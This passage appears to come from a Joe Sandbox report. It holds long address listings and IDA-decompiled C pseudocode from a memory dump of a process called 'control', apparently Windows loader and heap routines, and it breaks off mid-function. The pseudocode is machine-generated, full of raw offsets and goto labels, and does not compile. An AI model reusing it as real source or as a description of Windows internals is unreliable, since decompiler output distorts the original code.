0x04cdf115
0x04cdf122
0x04cdf127
0x04cdf12b
0x04d1fe64
0x04d1fe6a
0x04d1fe6a
0x00000000
0x04cdf12b
0x04cdef72
0x04cdef74
0x00000000
0x00000000
0x04cdef7a
0x04cdef7d
0x04cdef7d
0x04cdef7d
0x04cdef81
0x04cdf144
0x04cdf144
0x04cdf14a
0x04d1fd20
0x04d1fd23
0x04cdef90
0x04cdef90
0x04cdef93
0x04d1fd2e
0x04d1fd31
0x00000000
0x00000000
0x04d1fd37
0x04d1fd45
0x04d1fd4b
0x04d1fd4b
0x04d1fd4e
0x00000000
0x00000000
0x00000000
0x04d1fd54
0x04d1fd3c
0x04d1fd3f
0x00000000
0x00000000
0x00000000
0x04d1fd3f
0x04cdef99
0x04cdef99
0x04cdef9c
0x04cdf1a6
0x04cdf1a9
0x00000000
0x00000000
0x00000000
0x04cdf1af
0x04cdefa2
0x04cdefa2
0x04cdefa5
0x04cdefab
0x04cdefae
0x04cdefb4
0x04cdefba
0x04cdefc0
0x04cdefc6
0x04cdefcc
0x04cdefd8
0x04cdefde
0x04cdefe1
0x04cdefe7
0x04cdefe9
0x04cdefec
0x04cdeff3
0x04cdeff8
0x04cdeffa
0x04cdefff
0x04cdf002
0x04cdf008
0x04cdf00a
0x04cdf15d
0x04cdf164
0x04cdf165
0x04cdf168
0x04cdf16b
0x04cdf16e
0x04cdf170
0x00000000
0x00000000
0x04cdf176
0x04cdf17a
0x04cdf1c8
0x04cdf1cf
0x04cdf1d0
0x04cdf1d3
0x00000000
0x04cdf1d3
0x04cdf17c
0x04cdf105
0x04cdf105
0x04cdf108
0x04cdf10a
0x04cdf1b7
0x04cdf1b7
0x04cdf110
0x00000000
0x04cdf110
0x04cdf010
0x04cdf010
0x04cdf013
0x04cdf0a2
0x04cdf0a2
0x04cdf0a6
0x04cdf186
0x04cdf186
0x04cdf0ac
0x04cdf0b0
0x04d1fe56
0x04d1fe56
0x04cdf103
0x04cdf103
0x00000000
0x04cdf103
0x04cdf0bc
0x04cdf0c3
0x04cdf0c4
0x04cdf0c7
0x04cdf0ce
0x04d1fe35
0x04d1fe35
0x04d1fe39
0x00000000
0x00000000
0x04d1fe41
0x04d1fe41
0x04d1fe42
0x04d1fe48
0x04d1fe51
0x00000000
0x04d1fe51
0x04cdf0d4
0x04cdf0db
0x00000000
0x00000000
0x04cdf0e1
0x04cdf0e5
0x04cdf193
0x04cdf199
0x04cdf19b
0x00000000
0x00000000
0x04cdf0f4
0x04cdf0f4
0x04cdf0f8
0x04cdf0fa
0x04cdf0fd
0x04d1fe1e
0x04d1fe21
0x04d1fe24
0x04d1fe27
0x04d1fe2a
0x04d1fe2d
0x04d1fe2d
0x04cdf0fd
0x00000000
0x04cdf0f8
0x04cdf0eb
0x04cdf0ee
0x04cdf0f1
0x00000000
0x04cdf0f1
0x04cdf01c
0x04cdf01f
0x04cdf02a
0x04cdf02d
0x04cdf030
0x04cdf034
0x04cdf036
0x04cdf039
0x04cdf045
0x04cdf051
0x04cdf05a
0x04cdf05a
0x04cdf05d
0x04cdf060
0x04cdf062
0x04d1fd59
0x04d1fd5c
0x00000000
0x00000000
0x04d1fd62
0x04d1fd66
0x04d1fd72
0x04d1fd84
0x04d1fd8a
0x04d1fd8d
0x04d1fd90
0x00000000
0x04d1fd90
0x04d1fd68
0x04d1fd6c
0x00000000
0x00000000
0x00000000
0x04cdf068
0x04cdf068
0x04cdf068
0x04cdf06d
0x04d1fd98
0x04d1fda8
0x04d1fdae
0x04d1fdae
0x04cdf073
0x04cdf078
0x04cdf07a
0x04d1fdbf
0x04cdf080
0x04cdf080
0x04cdf080
0x04cdf085
0x04cdf088
0x04d1fde1
0x04d1fde4
0x04d1fde4
0x04cdf08e
0x04cdf095
0x04cdf09d
0x00000000
0x04cdf09d
0x04cdf062
0x04d1fd29
0x04cdf150
0x04cdf153
0x00000000
0x00000000
0x00000000
0x04cdf155
0x04cdef87
0x04cdef8a
0x04cdf136
0x04cdf13c
0x04cdf13e
0x00000000
0x00000000
0x00000000
0x04cdf13e
0x00000000
0x04cdef8a

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39153ea90f8d53c99329ed290f0ef45efe78f8c136dc236346b7b7bb1bfc54e1
Instruction ID: 7067d23bf1a0db1ba9aa5fe6d03df14827856af87937bc36950d55a69fd3f648
Opcode Fuzzy Hash: 39153ea90f8d53c99329ed290f0ef45efe78f8c136dc236346b7b7bb1bfc54e1
Instruction Fuzzy Hash: 1EE10075E00608DFCB25CFA9D984AADBBF2FF48304F14456EEA46AB660D730A941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CCCF00 Relevance: .3, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E04CCCF00(void* __ecx, signed int __edx, signed int _a4, signed short* _a8, signed int _a12, signed int* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				char _v140;
				char _v165;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v181;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int* _v220;
				char _v224;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t118;
				signed int _t122;
				void* _t124;
				signed int _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				signed int _t143;
				intOrPtr _t146;
				signed int _t147;
				signed char _t154;
				intOrPtr _t156;
				intOrPtr _t160;
				void* _t165;
				signed int _t167;
				signed int _t168;
				void* _t169;
				signed int _t170;
				signed int _t174;
				void* _t175;
				void* _t176;
				signed short _t177;
				unsigned int _t181;
				signed char _t187;
				signed char _t189;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t213;
				void* _t215;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed short* _t223;
				signed int _t225;
				void* _t226;
				signed int _t228;
				void* _t230;
				signed int _t231;

				_t211 = __edx;
				_t176 = __ecx;
				_v8 =  *0x4dab370 ^ _t231;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_v208 = _a12;
				_t223 = _a8;
				_v220 = _a16;
				_v196 = _a24;
				_v180 = 0;
				_v165 = 0;
				if( *_t2 == 0) {
					L2:
					_v200 = 9;
				} else {
					_t165 = E04CD2180(0x4da32d8);
					_v200 = 6;
					if(_t165 == 0) {
						goto L2;
					}
				}
				if(_t223 == 0) {
					_t118 = 0;
					__eflags = 0;
					_v172 = 0;
					L13:
					_t167 = _a4;
					_t224 = _v188;
					_v212 = _t118;
					while(1) {
						_t218 = 0;
						_t177 = 0x1000;
						_v176 = 0;
						__eflags = _t167;
						if(_t167 == 0) {
							break;
						}
						__eflags = _t167 -  *0x4da5d6c; // 0x77ca0000
						if(__eflags != 0) {
							L04CC2330(_t118, 0x4da6668);
							_t187 =  *0x4da67a8; // 0x2f11e88
							_t130 =  *0x4da67a4; // 0x2f12ec8
							__eflags = _t187 & 0x00000001;
							if((_t187 & 0x00000001) != 0) {
								__eflags = _t130;
								if(_t130 == 0) {
									_t130 = 0;
									__eflags = 0;
								} else {
									_t130 = _t130 ^ 0x04da67a4;
								}
							}
							_t213 = _t187 & 1;
							__eflags = _t130;
							if(_t130 == 0) {
								L32:
								_t211 = _t218;
							} else {
								do {
									_t41 = _t130 - 0x50; // 0x76ab0000
									__eflags = _t167 -  *_t41;
									if(__eflags < 0) {
										_t207 =  *_t130;
										L27:
										__eflags = _t213;
										if(_t213 == 0) {
											L30:
											_t130 = _t207;
										} else {
											__eflags = _t207;
											if(_t207 == 0) {
												goto L30;
											} else {
												_t130 = _t130 ^ _t207;
											}
										}
										goto L31;
									} else {
										if(__eflags <= 0) {
											__eflags = _t130;
											if(_t130 == 0) {
												goto L32;
											} else {
												_t47 = _t130 - 0x18; // 0x2f124d0
												_t208 =  *_t47;
												_t48 = _t130 - 0x68; // 0x2f12e60
												_t211 = _t48;
												_v176 = _t211;
												__eflags =  *((intOrPtr*)(_t208 + 0xc)) - 0xffffffff;
												if( *((intOrPtr*)(_t208 + 0xc)) != 0xffffffff) {
													_t156 =  *_t208;
													__eflags =  *(_t156 - 0x20) & 0x00000020;
													if(( *(_t156 - 0x20) & 0x00000020) == 0) {
														asm("lock inc dword [edx+0x9c]");
														_t54 = _t211 + 0x50; // 0x2f124d0
														_t208 =  *_t54;
													}
												}
												_t55 = _t208 + 0x20; // 0x9
												_t224 =  *_t55;
												_v188 = _t224;
												goto L33;
											}
											goto L50;
										} else {
											_t42 = _t130 + 4; // 0x2f12580
											_t207 =  *_t42;
											goto L27;
										}
									}
									goto L33;
									L31:
									__eflags = _t130;
								} while (_t130 != 0);
								goto L32;
							}
							L33:
							_t218 = 0x4da6668;
							asm("lock cmpxchg [edi], ecx");
							_t189 = 1;
							__eflags = 1 - 1;
							if(1 != 1) {
								while(1) {
									__eflags = _t189 & 0x00000004;
									if((_t189 & 0x00000004) != 0) {
										goto L43;
									}
									L36:
									__eflags = _t189 & 0x00000002;
									if((_t189 & 0x00000002) == 0) {
										goto L43;
									} else {
										_t218 = 3;
									}
									L44:
									_t215 = _t218 + _t189;
									_t154 = _t189;
									asm("lock cmpxchg [ebx], esi");
									__eflags = _t154 - _t189;
									if(_t154 != _t189) {
										_t189 = _t154;
										__eflags = _t189 & 0x00000004;
										if((_t189 & 0x00000004) != 0) {
											goto L43;
										}
										goto L44;
									}
									_t167 = _a4;
									__eflags = _t218 - 3;
									if(_t218 == 3) {
										__eflags = 0;
										E04CE3BDB(0x4da6668, 0, _t215);
									}
									_t224 = _v188;
									_t211 = _v176;
									goto L49;
									L43:
									_t218 = _t218 | 0xffffffff;
									__eflags = _t218;
									goto L44;
								}
							}
							L49:
							_t177 = 0x1000;
						} else {
							_t211 =  *0x4da5d68; // 0x2f11d70
							_v176 = _t211;
							_t36 = _t211 + 0x50; // 0x2f13f98
							_t37 =  *_t36 + 0x20; // 0x9
							_t224 =  *_t37;
							_v188 = _t224;
						}
						L50:
						__eflags = _t211;
						if(_t211 == 0) {
							break;
						} else {
							_t132 =  *[fs:0x18];
							__eflags =  *(_t132 + 0xfca) & _t177;
							if(( *(_t132 + 0xfca) & _t177) != 0) {
								L56:
								_v192 = 0;
								_t133 = E04D310DF(_v196,  &_v192, 0);
								_t218 = _v176;
								__eflags = _t133;
								_t211 = _t218;
								_v192 = (_t133 < 0x00000000) - 0x00000001 & _v192;
								_t135 = E04D06039((_t133 < 0x00000000) - 0x00000001 & _v192, _t218, _v172, _v208, 1,  &_v180);
								_t195 = _v192;
								_t170 = _t135;
								__eflags = _v192;
								if(_v192 != 0) {
									E04CCD3E1(_t170, _t195, _t224);
								}
								__eflags = _t170;
								if(_t170 >= 0) {
									__eflags = _t224 - 7;
									if(_t224 == 7) {
										__eflags = _a20;
										if(_a20 == 0) {
											_t146 =  *[fs:0x18];
											__eflags =  *(_t146 + 0xfca) & 0x00001000;
											if(( *(_t146 + 0xfca) & 0x00001000) != 0) {
												_t147 = E04CD2180(0x4da32d8);
												__eflags = _t147;
												if(_t147 == 0) {
													_t211 = 0;
													__eflags = 0;
													_v181 = _t147;
													_t170 = E04CD1934( *((intOrPtr*)(_t218 + 0x50)), 0,  &_v181);
												}
											}
										}
									}
									__eflags = _t170;
									if(_t170 >= 0) {
										__eflags =  *0x4da9230;
										_t224 = _v196;
										if(__eflags != 0) {
											_t211 =  *(_t218 + 0x18);
											E04D38514(_t224,  *(_t218 + 0x18), __eflags, _v180, 0,  &_v180);
										}
										__eflags =  *0x4da65f0;
										if( *0x4da65f0 != 0) {
											_t228 =  *0x4da91f0; // 0x0
											_v204 = 0;
											_t211 =  *0x7ffe0330;
											asm("ror esi, cl");
											_t224 = _t228 ^  *0x7ffe0330;
											 *0x4da91e0( &_v204, _t218, _v180, 0, _t224);
											 *(_t228 ^  *0x7ffe0330)();
											_t143 = _v204;
											__eflags = _t143;
											if(_t143 != 0) {
												_v180 = _t143;
											}
										}
									} else {
										_v180 = 0;
									}
								}
								__eflags = _t170 - 0xc0000135;
								if(_t170 == 0xc0000135) {
									L73:
									_t168 = 0xc000007a;
								} else {
									__eflags = _t170 - 0xc0000142;
									if(_t170 == 0xc0000142) {
										goto L73;
									}
								}
								E04CCD3E1(_t168, _t218, _t224);
								__eflags = _t168 - 0xc000007a;
								if(_t168 != 0xc000007a) {
									goto L79;
								} else {
									_t225 = _v172;
									__eflags = _t225;
									if(_t225 == 0) {
										_t225 = _v208;
									}
									_t211 = _t225;
									__eflags = _v212;
									_t168 = (0 | _v212 != 0x00000000) + 0xc0000138;
									_push(_t168);
									E04CE9F93(_t168, 0, _t225);
								}
							} else {
								__eflags = _t224 - _v200;
								if(_t224 >= _v200) {
									goto L56;
								} else {
									E04CCD3E1(_t167, _t211, _t224);
									__eflags = _t224;
									if(_t224 < 0) {
										_t168 = 0xc000000d;
										L79:
										_t225 = _v172;
									} else {
										E04CD19DF(0);
										_t118 = E04CE79F9();
										continue;
									}
								}
							}
						}
						__eflags = _v165;
						if(_v165 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t225);
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							_t122 =  *0x4da9300; // 0xaa0000
							__eflags = _t122 |  *0x4da9304;
							if((_t122 |  *0x4da9304) != 0) {
								__eflags =  *0x4da92e4 & 0x00000001;
								if(( *0x4da92e4 & 0x00000001) == 0) {
									_t181 =  *0x4da92ec; // 0x100
									__eflags = (_t181 >> 0x00000008 & 0x00000003) - 3;
									if((_t181 >> 0x00000008 & 0x00000003) == 3) {
										_t211 =  &_v216;
										_t124 = E04D63CD0(_v180,  &_v216, _t218);
										__eflags = _t124 - 1;
										if(_t124 != 1) {
											__eflags = _v216 & 0x00000010;
											if((_v216 & 0x00000010) != 0) {
												_t211 = 4;
												_t168 = E04D63C53(4,  &_v224);
												__eflags = _t168;
												if(_t168 < 0) {
													asm("int 0x29");
												}
											}
										}
									}
								}
							}
						}
						_pop(_t219);
						_pop(_t226);
						 *_v220 = _v180;
						__eflags = _v8 ^ _t231;
						_pop(_t169);
						return E04CF4B50(_t168, _t169, _v8 ^ _t231, _t211, _t219, _t226);
						goto L91;
					}
					_t168 = 0xc0000135;
					goto L79;
				} else {
					_t174 =  *_t223 & 0x0000ffff;
					_t16 = _t174 + 1; // 0x1
					_t220 = _t16;
					if((_t223[1] & 0x0000ffff) < _t220) {
						L6:
						if(_t220 <= 0x80) {
							_t158 =  &_v140;
							_v172 =  &_v140;
							L11:
							E04CF88C0(_t158, _t223[2], _t174);
							_t118 = _v172;
							 *((char*)(_t118 + _t220 - 1)) = 0;
							goto L13;
						} else {
							_t160 =  *0x4da5d78; // 0x0
							_t158 = E04CC5D90(_t176,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t160 + 0x180000, _t220);
							_v172 = _t158;
							if(_t158 != 0) {
								_v165 = 1;
								goto L11;
							} else {
								_pop(_t221);
								_pop(_t230);
								_pop(_t175);
								return E04CF4B50(0xc000009a, _t175, _v8 ^ _t231, _t211, _t221, _t230);
							}
						}
					} else {
						_t118 = _t223[2];
						_v172 = _t118;
						if( *((char*)(_t174 + _t118)) == 0) {
							goto L13;
						} else {
							goto L6;
						}
					}
				}
				L91:
			}

0x04cccf00
0x04cccf00
0x04cccf12
0x04cccf15
0x04cccf15
0x04cccf1d
0x04cccf27
0x04cccf2a
0x04cccf34
0x04cccf3a
0x04cccf44
0x04cccf4b
0x04cccf65
0x04cccf65
0x04cccf4d
0x04cccf52
0x04cccf57
0x04cccf63
0x00000000
0x00000000
0x04cccf63
0x04cccf71
0x04ccd007
0x04ccd007
0x04ccd009
0x04ccd00f
0x04ccd00f
0x04ccd012
0x04ccd018
0x04ccd01e
0x04ccd01e
0x04ccd020
0x04ccd025
0x04ccd02b
0x04ccd02d
0x00000000
0x00000000
0x04ccd033
0x04ccd039
0x04ccd05d
0x04ccd062
0x04ccd068
0x04ccd06d
0x04ccd070
0x04ccd072
0x04ccd074
0x04ccd07d
0x04ccd07d
0x04ccd076
0x04ccd076
0x04ccd076
0x04ccd074
0x04ccd082
0x04ccd085
0x04ccd087
0x04ccd0b0
0x04ccd0b0
0x04ccd090
0x04ccd090
0x04ccd090
0x04ccd090
0x04ccd093
0x04ccd09c
0x04ccd09e
0x04ccd09e
0x04ccd0a0
0x04ccd0aa
0x04ccd0aa
0x04ccd0a2
0x04ccd0a2
0x04ccd0a4
0x00000000
0x04ccd0a6
0x04ccd0a6
0x04ccd0a6
0x04ccd0a4
0x00000000
0x04ccd095
0x04ccd095
0x04ccd0e1
0x04ccd0e3
0x00000000
0x04ccd0e5
0x04ccd0e5
0x04ccd0e5
0x04ccd0e8
0x04ccd0e8
0x04ccd0eb
0x04ccd0f1
0x04ccd0f5
0x04ccd0f7
0x04ccd0f9
0x04ccd0fd
0x04ccd0ff
0x04ccd106
0x04ccd106
0x04ccd106
0x04ccd0fd
0x04ccd109
0x04ccd109
0x04ccd10c
0x00000000
0x04ccd10c
0x00000000
0x04ccd097
0x04ccd097
0x04ccd097
0x00000000
0x04ccd097
0x04ccd095
0x00000000
0x04ccd0ac
0x04ccd0ac
0x04ccd0ac
0x00000000
0x04ccd090
0x04ccd0b2
0x04ccd0b9
0x04ccd0be
0x04ccd0c2
0x04ccd0c4
0x04ccd0c7
0x04ccd0d0
0x04ccd0d0
0x04ccd0d3
0x00000000
0x00000000
0x04ccd0d5
0x04ccd0d5
0x04ccd0d8
0x00000000
0x04ccd0da
0x04ccd0da
0x04ccd0da
0x04ccd117
0x04ccd117
0x04ccd11a
0x04ccd11e
0x04ccd122
0x04ccd124
0x04ccd126
0x04ccd0d0
0x04ccd0d3
0x00000000
0x00000000
0x00000000
0x04ccd0d3
0x04ccd12a
0x04ccd12d
0x04ccd130
0x04ccd133
0x04ccd13a
0x04ccd13a
0x04ccd13f
0x04ccd145
0x00000000
0x04ccd114
0x04ccd114
0x04ccd114
0x00000000
0x04ccd114
0x04ccd0d0
0x04ccd14b
0x04ccd14b
0x04ccd03b
0x04ccd03b
0x04ccd041
0x04ccd047
0x04ccd04a
0x04ccd04a
0x04ccd04d
0x04ccd04d
0x04ccd150
0x04ccd150
0x04ccd152
0x00000000
0x04ccd158
0x04ccd158
0x04ccd15e
0x04ccd165
0x04ccd195
0x04ccd1a3
0x04ccd1ad
0x04ccd1b2
0x04ccd1ba
0x04ccd1bc
0x04ccd1dd
0x04ccd1e3
0x04ccd1e8
0x04ccd1ee
0x04ccd1f0
0x04ccd1f2
0x04ccd1f4
0x04ccd1f4
0x04ccd1f9
0x04ccd1fb
0x04ccd201
0x04ccd204
0x04ccd206
0x04ccd20a
0x04ccd20c
0x04ccd217
0x04ccd21e
0x04ccd225
0x04ccd22a
0x04ccd22c
0x04ccd231
0x04ccd231
0x04ccd233
0x04ccd245
0x04ccd245
0x04ccd22c
0x04ccd21e
0x04ccd20a
0x04ccd247
0x04ccd249
0x04ccd25a
0x04ccd261
0x04ccd267
0x04ccd269
0x04ccd27d
0x04ccd27d
0x04ccd282
0x04ccd289
0x04ccd28c
0x04ccd2a0
0x04ccd2af
0x04ccd2be
0x04ccd2c0
0x04ccd2c4
0x04ccd2ca
0x04ccd2cc
0x04ccd2d2
0x04ccd2d4
0x04ccd2d6
0x04ccd2d6
0x04ccd2d4
0x04ccd24b
0x04ccd24b
0x04ccd24b
0x04ccd249
0x04ccd2dc
0x04ccd2e2
0x04ccd2ec
0x04ccd2ec
0x04ccd2e4
0x04ccd2e4
0x04ccd2ea
0x00000000
0x00000000
0x04ccd2ea
0x04ccd2f3
0x04ccd2f8
0x04ccd2fe
0x00000000
0x04ccd300
0x04ccd300
0x04ccd306
0x04ccd308
0x04ccd30a
0x04ccd30a
0x04ccd312
0x04ccd314
0x04ccd31f
0x04ccd325
0x04ccd326
0x04ccd326
0x04ccd167
0x04ccd167
0x04ccd16d
0x00000000
0x04ccd16f
0x04ccd171
0x04ccd176
0x04ccd178
0x04ccd18b
0x04ccd332
0x04ccd332
0x04ccd17a
0x04ccd17c
0x04ccd181
0x00000000
0x04ccd181
0x04ccd178
0x04ccd16d
0x04ccd165
0x04ccd338
0x04ccd33f
0x04ccd34d
0x04ccd34d
0x04ccd352
0x04ccd354
0x04ccd356
0x04ccd35b
0x04ccd361
0x04ccd363
0x04ccd36a
0x04ccd36c
0x04ccd378
0x04ccd37b
0x04ccd383
0x04ccd38b
0x04ccd390
0x04ccd393
0x04ccd395
0x04ccd39c
0x04ccd3a4
0x04ccd3b1
0x04ccd3b3
0x04ccd3b5
0x04ccd3bc
0x04ccd3bc
0x04ccd3b5
0x04ccd39c
0x04ccd393
0x04ccd37b
0x04ccd36a
0x04ccd361
0x04ccd3ca
0x04ccd3cb
0x04ccd3cc
0x04ccd3d3
0x04ccd3d5
0x04ccd3de
0x00000000
0x04ccd3de
0x04ccd32d
0x00000000
0x04cccf77
0x04cccf77
0x04cccf7e
0x04cccf7e
0x04cccf83
0x04cccf94
0x04cccf9a
0x04cccfe1
0x04cccfe7
0x04cccfed
0x04cccff2
0x04cccff7
0x04ccd000
0x00000000
0x04cccf9c
0x04cccf9c
0x04cccfb1
0x04cccfb6
0x04cccfbe
0x04cccfd8
0x00000000
0x04cccfc0
0x04cccfc5
0x04cccfc6
0x04cccfc7
0x04cccfd5
0x04cccfd5
0x04cccfbe
0x04cccf85
0x04cccf85
0x04cccf88
0x04cccf92
0x00000000
0x00000000
0x00000000
0x00000000
0x04cccf92
0x04cccf83
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c311ae87113336ff398c145b6a19b6f56ac53d655753368c8af1e5c26df41e17
Instruction ID: 630d12d032b4c9cb6aa0cd585a6212df680f424b2c10c21363f0648b29f23aeb
Opcode Fuzzy Hash: c311ae87113336ff398c145b6a19b6f56ac53d655753368c8af1e5c26df41e17
Instruction Fuzzy Hash: BBD19431B003159FEB25DF19C894BAAB7B7AB45314F0840EDD94AA7281DB34BE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04CC0445 Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04CC0445(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t105;
				signed int _t107;
				intOrPtr _t108;
				unsigned int _t112;
				signed int _t114;
				signed int _t125;
				signed int _t126;
				signed char* _t129;
				intOrPtr _t130;
				signed int _t131;
				signed char* _t134;
				signed int _t140;
				char* _t143;
				unsigned int _t160;
				signed int _t177;
				signed int _t180;
				char _t181;
				signed int _t183;
				signed int _t188;
				signed int* _t201;
				intOrPtr _t208;
				signed int* _t209;
				unsigned int _t210;
				signed int _t211;
				signed int _t216;

				_t208 = __edx;
				_t216 = __ecx;
				_v24 = __edx;
				_t171 = 0;
				_t3 = _t208 + 0xfff; // 0xfff
				_v16 = _t3 & 0xfffff000;
				if(E04CC0680(__ecx,  &_v16) == 0) {
					__eflags =  *(_t216 + 0x40) & 0x00000002;
					if(( *(_t216 + 0x40) & 0x00000002) == 0) {
						L59:
						__eflags =  *(_t216 + 0x40) & 0x00000080;
						if(( *(_t216 + 0x40) & 0x00000080) == 0) {
							L63:
							_t209 = 0;
							__eflags = _t171;
							if(_t171 != 0) {
								__eflags =  *(_t216 + 0x4c);
								if( *(_t216 + 0x4c) != 0) {
									 *(_t171 + 3) =  *(_t171 + 2) ^  *(_t171 + 1) ^  *_t171;
									 *_t171 =  *_t171 ^  *(_t216 + 0x50);
								}
							}
							L3:
							return _t209;
						}
						_t171 = E04D5790F(_t216);
						__eflags = _t171;
						if(_t171 == 0) {
							goto L63;
						}
						__eflags = ( *_t171 & 0x0000ffff) - _t208;
						if(( *_t171 & 0x0000ffff) < _t208) {
							goto L63;
						}
						_t209 = _t171;
						goto L3;
					}
					_v12 = _v12 & 0;
					_t210 = _t208 + 0x2000;
					_t105 =  *((intOrPtr*)(_t216 + 0x64));
					__eflags = _t210 - _t105;
					if(_t210 > _t105) {
						_t105 = _t210;
					}
					__eflags =  *((char*)(_t216 + 0xea)) - 2;
					if( *((char*)(_t216 + 0xea)) != 2) {
						_t177 = 0;
					} else {
						_t177 =  *(_t216 + 0xe4);
					}
					__eflags = _t177;
					if(_t177 == 0) {
						__eflags = _t105 - 0x3f4000;
						if(_t105 >= 0x3f4000) {
							 *(_t216 + 0x48) =  *(_t216 + 0x48) | 0x20000000;
						}
					}
					_t107 = _t105 + 0x0000ffff & 0xffff0000;
					_v8 = _t107;
					__eflags = _t107 - 0xfd0000;
					if(_t107 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t108 = E04CAF0E1(_t216, 1);
					_push(_t108);
					_push(0x2000);
					_v28 = _t108;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t180 = E04CF2B10();
					__eflags = _t180;
					if(_t180 < 0) {
						while(1) {
							_t112 = _v8;
							__eflags = _t112 - _t210;
							if(_t112 == _t210) {
								break;
							}
							_t160 = _t112 >> 1;
							_v8 = _t160;
							__eflags = _t160 - _t210;
							if(_t160 < _t210) {
								_v8 = _t210;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t180 = E04CF2B10();
							__eflags = _t180;
							if(_t180 < 0) {
								continue;
							} else {
								_t112 = _v8;
								break;
							}
						}
						__eflags = _t180;
						if(_t180 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t216 + 0x224)) =  *((intOrPtr*)(_t216 + 0x224)) + 1;
						_t208 = _v24;
						goto L59;
					} else {
						_t112 = _v8;
						L12:
						_t208 = _v24;
						 *((intOrPtr*)(_t216 + 0x64)) =  *((intOrPtr*)(_t216 + 0x64)) + _t112;
						_t30 = _t208 + 0x1000; // 0x4cc8a73
						_t181 = _t30;
						__eflags = _t181 -  *((intOrPtr*)(_t216 + 0x68));
						if(_t181 <=  *((intOrPtr*)(_t216 + 0x68))) {
							_t181 =  *((intOrPtr*)(_t216 + 0x68));
						}
						_v20 = _t181;
						_t114 = E04CE68EA( *((intOrPtr*)(_t216 + 0x1f8)) -  *((intOrPtr*)(_t216 + 0x244)), _t216, _t216 + 0xd4);
						__eflags = _t114;
						if(_t114 == 0) {
							L58:
							E04CAFABA( &_v12,  &_v8, 0x8000);
							goto L59;
						} else {
							_push(_v28);
							_push(0x1000);
							_push( &_v20);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t211 = E04CF2B10();
							__eflags = _t211;
							if(_t211 < 0) {
								L57:
								_t208 = _v24;
								goto L58;
							}
							_t125 = E04CE1EED(_t216, _v12, 0x40, _t181, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t197);
							__eflags = _t125;
							if(_t125 == 0) {
								_t211 = 0xc0000017;
							}
							__eflags = _t211;
							if(_t211 < 0) {
								goto L57;
							} else {
								_t126 = E04CC3C40();
								_t212 = 0x7ffe0380;
								__eflags = _t126;
								if(_t126 != 0) {
									_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t129 = 0x7ffe0380;
								}
								__eflags =  *_t129;
								if( *_t129 != 0) {
									_t130 =  *[fs:0x30];
									__eflags =  *(_t130 + 0x240) & 0x00000001;
									if(( *(_t130 + 0x240) & 0x00000001) != 0) {
										E04D6EFD3(0x226, _t216, _v12, _v20, 4);
										__eflags = E04CC3C40();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										_t183 = _t216;
										E04D6F1C3(0x226, _t183,  *(_v12 + 0x24), __eflags, _v20,  *(_t216 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t131 = E04CC3C40();
								_t213 = 0x7ffe038a;
								__eflags = _t131;
								if(_t131 != 0) {
									_t134 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t134 = 0x7ffe038a;
								}
								__eflags =  *_t134;
								if( *_t134 != 0) {
									__eflags = E04CC3C40();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									_t183 = _t216;
									E04D6F1C3(0x230, _t183,  *(_v12 + 0x24), __eflags, _v20,  *(_t216 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t140 = E04CC3C40();
								__eflags = _t140;
								if(_t140 != 0) {
									_t143 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t143 = 0x7ffe0388;
								}
